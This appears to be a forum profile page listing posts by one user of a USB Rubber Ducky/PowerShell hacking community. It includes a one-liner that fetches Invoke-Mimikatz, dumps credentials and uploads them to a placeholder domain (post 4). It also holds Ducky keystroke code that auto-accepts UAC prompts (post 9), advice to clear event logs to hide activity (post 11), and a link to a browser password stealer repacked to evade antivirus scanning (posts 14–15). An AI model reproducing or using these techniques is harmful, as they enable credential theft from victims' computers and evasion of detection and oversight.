Enzym3

Active Members
  • Posts: 30
  • Joined
  • Last visited
  • Days Won: 1

Enzym3's Achievements

Newbie (1/14)

  1. https://wifipineapple.github.io/wifipineapple-wiki//#!setup.md
  2. According to Darren, yes. Not sure which version of the firmware that would be though.
  3. If my above response wasn't helpful, try adding this line of code before the Net.WebClient line: [System.Net.ServicePointManager]::Expect100Continue = $false http://stackoverflow.com/questions/566437/http-post-returns-error-417-expectation-failed
  4. Is that the EXACT output from the console, or did you edit the URL for privacy before posting? If this is copied straight from your console, then the problem would be:
     IEX(New-Object Net.WebClient).DownloadString('http://<my domain.com>/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://<my domain.com>/capture.php',$o)
     You'd need to change the highlighted section to an actual domain which you wish to use. I have a feeling you edited it like that on purpose, but it wouldn't be the first time I've seen someone copy/paste code and run it without noticing it needs to be modified to fit first.
  5. Not that I could find, but you can just as easily pause the video at certain times to copy the code yourself.
  6. I got the same results as you. There are, of course, plenty of payloads that can be run on a non-administrator level of PowerShell/CMD and certain privilege escalation attacks that can be done, but this does provide a very big deterrent to many of the ducky payloads you see out there right now.
  7. Awesome idea! I'll try to get around to test it out over the weekend if I'm not busy finishing up a work project. If I do, I'll report back with my experience using it. Cheers!
  8. I have not run into that issue before, but good looking out. I'll keep an eye out for it and make sure to account for it. Good call too on CTRL + C to jump to the next line. Much easier!
  9. I'm certain there's a way to do what you're wanting to do, but it may require too much work or a very specific exploit to actually be viable, since most often you want a payload that will work on a broad range of hosts. I wish I had an answer for you, but I just started messing with PowerShell in the past few weeks, so my knowledge is still extremely basic. One other tip I will give you that I quickly learned and don't see any other payloads accounting for is writing payloads that will work both with UAC and without UAC enabled. And by that I mean having your payload press ALT + Y to bypass the UAC prompt while accounting for any hosts that don't prompt for UAC, which will end up causing the PowerShell script to begin with a 'y' (since the dialog box doesn't pop up, it ends up typing in the PowerShell window), thus causing an error when the following command is executed. Before you start inserting your first line of code, you need to LEFTARROW and then press DELETE to take care of the leading 'y' first. Therefore, I always write my UAC bypass portion of my payloads like this:
     <...>
     STRING powershell Start-Process powershell -Verb runAs
     ENTER
     DELAY 300
     ALT y
     DELAY 300
     LEFTARROW
     DELAY 50
     DELETE
     DELAY 50
     STRING $usbpath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'QUACK' } | select name
     <...>
     Cheers, -Enzym3
  10. Just a tip: You can use the -whatif parameter in PowerShell at the end of any line of code that will make changes to your system to see the result of executing the code without it actually executing. Additionally, you can use -confirm in a similar fashion to be prompted before the changes take effect. This is how I tested your code to see why it wasn't working. I opened two separate PowerShell windows, typed in your code, added the -whatif parameter to the end in each, and here's what I got: Non-administrator shell: Administrator shell:
  11. You would require running PowerShell in administrator mode in order to execute that code, meaning you'll have to bypass UAC the old-fashioned way using ALT + Y for at least the first time you run it on a targeted machine that has UAC enabled. However, it would still be useful if you intend to run multiple payloads that would require bypassing multiple prompts, or any situation where you may not want a user to catch on to things being executed while they're actively using the PC. That being said, a smart user may notice that UAC has been disabled and start sniffing around, so make sure your payloads are clearing the system event logs at the end.
  12. Keep in mind, this is not what I intended to release. This was just a few hours' work taking two separate tools already available, heavily gutting and jerry-rigging them just enough that I knew they would work in concept. Prior to starting this project, I had zero experience in PowerShell (besides using it to run common/simple things often used in CMD), so I was teaching myself as I went by tracing the code already there and experimenting. If you see some edits I've made and it looks sloppy as all hell, or there are multiple lines of code that could easily be a few bits of code, or you see redundant variables/daisy-chained variables, it's probably because I was changing little bits of code around to test and learn, after which I know there is a ton of code cleanup to do as well as removing lots of unnecessary code left over from separate functions the tool could do for which I didn't have any use. But, if anyone sees any errors that would be a good learning opportunity, I would love to hear what you have to say. I'm a sponge for knowledge and I look forward to slowly tweaking everything and making it efficient and adding a handful of other handy features. TL;DR - I'm brand new to PowerShell. It's messy. I'm sorry, but I'm just sharing what I have in hopes other newbies at PS can learn something as well. Hopefully someone finds something useful here, or at least it can serve as a springboard for some way cooler shit. Cheers, -Enzym3
  13. Can you post some more info? Such as the payload you're referencing and any other info you can supply? It's hard for anyone to help you out if they don't have all the info they need.
  14. Ah hah! It worked. I had to wrap it into a WinRAR archive so that I could password protect it and encrypt the filenames, and when I tested the download link it actually worked correctly. Download link: https://drive.google.com/open?id=0Bz2WgiBl-P0jMEYzQzBVSkVMVmM The password to access the archive is: quack Cheers, -Enzym3
  15. Ugh. Sorry, fellas. I just got back home and saw all the fuss. I don't know what exactly it was about that ZIP archive that violated Google's TOS, but I've never had that issue before. It's possible that maybe their AV scan flagged the browser password stealer tool or one of the PowerShell scripts as malicious. I'm not certain. I'll see if I can just re-zip the file and add a password to it and hope that it will allow it to get around their AV scan by not allowing it access. I'll play around with it and figure something out.